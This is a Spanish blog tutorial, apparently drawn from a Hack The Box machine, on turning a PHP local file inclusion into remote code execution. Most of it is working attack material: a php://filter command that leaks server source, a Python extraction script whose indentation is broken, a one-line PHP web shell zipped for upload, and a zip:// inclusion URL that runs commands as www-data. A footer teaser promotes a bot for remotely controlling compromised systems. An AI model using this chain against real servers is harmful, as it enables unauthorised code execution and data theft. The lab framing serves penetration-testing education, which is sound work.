· Manuel López Pérez · tutoriales  · 3 min read

LFI a RCE - Abusando de los wrappers Filter y Zip con Python

Cómo abusar de los wrappers php://filter y zip:// para pasar de un LFI “complicado” a RCE: extraer código fuente vía base64 y ejecutar mediante inclusión de un ZIP.

Cómo abusar de los wrappers php://filter y zip:// para pasar de un LFI “complicado” a RCE: extraer código fuente vía base64 y ejecutar mediante inclusión de un ZIP.

En este post veremos como abusar de los wrappers php://filter y zip:// para conseguir RCE desde un LFI complicado de explotar con ayuda de python y burp-suite

Hay veces en las que el LFI se nos complica debido a una mejor programación de la pagina objetivo. Este ejemplo es de una maquina de HackTheBox al que me enfrenté hace unos días, no diré cual es esta maquina para evitar spoilers.

En este caso me encontré con un sitio que era vulnerable a LFI pero la inclusión se hacia mediante la función require_once de php y se agregaba la extensión .php al parámetro. Ademas no era vulnerable a la técnica que veíamos en el lfi-cheat-sheet de inyección de bytes null; esta era nuestro situación:

  • El archivo debia ser un php valido
  • No podia ver el contenido entre <? >
  • Cualquier cosa que pudiera incluir seria ejecutada

http://ejemplo.com/?op=home

Este portal tenia la función de recibir ‘tips’ o ‘notas’ de los usuarios. La única solución que se me ocurrió fue abusar del wrapper filter para obtener los .php del servidor y sacar así mas información. Mediante el comando:

curl http://ejemplo.com/?oper=php://filter/convert.base64-encode/resource=upload

* Donde ‘upload’ era el nombre del php que usaba para las subidas de archivos.

Obteniamos en Base64 el script de php. Que en este caso podíamos delimitarlo con las cadenas ‘PD9’ y '

' Para agilizar el proceso de examinar todos los .php me hice un script de python usando expresiones regulares: https://github.com/ironHackersDev/python-scripts/blob/master/phpAttack.py

#!/usr/bin/python
import requests
import base64
import re
def GetPHP(file):
    r = requests.get("http://ejemplo.com/?op=php://filter/convert.base64-encode/resource="+file)
    result = re.search('PD9(.*?)<footer>',r.text).group(1)
    b64 = "PD9" + result + "=="
    return base64.b64decode(b64)
    while True:
        cmd = raw_input("> ")
        try:
            output = GetPHP(cmd) print output
        except:
            if cmd == "exit" :
                break print "ERROR"

En el archivo upload.php veiamos esto:

function genFilename() { return sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() . mt_rand()); }

if (!is_dir('uploads/' . $client_ip)) { mkdir('uploads/' . $client_ip, 0755, false); } $tip = $_POST['tip']; $secretname = genFilename(); file_put_contents("uploads/". $client_ip . '/' . $secretname, $tip);

Básicamente lo que hace es crear un directorio con nuestra ip en /uploads y en el crea un fichero con un hash como nombre y con el texto arbitrario como contenido. En el resto de php de la pagina no encontramos gran cosa, así que lo único que nos quedaba era intentar abusar de wrapper Zip tal y como veiamos en el lfi-cheat-sheet. Ahora que sabíamos donde se iban a subir los archivos teníamos que crearnos nuestro script RCE y comprimirlo en un zip:

echo "<?php \\$_GET['param1'](\\$_GET['param2']); ?>" > shell.php zip -0 shell.zip shell.php

Mediante ‘paste from file’ de Burp-Suite conseguimos subir el archivo:

Una vez está subido solo nos queda abusar del wrapper zip:// y así conseguir RCE.

http://ejemplo.com/?op=zip://uploads/miIP/HASH%23shell¶m1=system¶m2=id uid=33(www-data) gid=33(www-data) groups=33(www-data)

Con esto podemos ejecutar comandos y convertirlo en una reverse shell fácilmente.

Referencias:

Share:
Back to Blog

Related Posts

View All Posts »
Control remoto de un sistema desde un Telegram-Bot

Control remoto de un sistema desde un Telegram-Bot

Guía para crear un bot de Telegram que permita controlar remotamente un sistema Linux comprometido: ejecución de comandos, enumeración, capturas de pantalla y encriptación de archivos. Incluye instalación y uso de ironHackers-Bot-Telegram.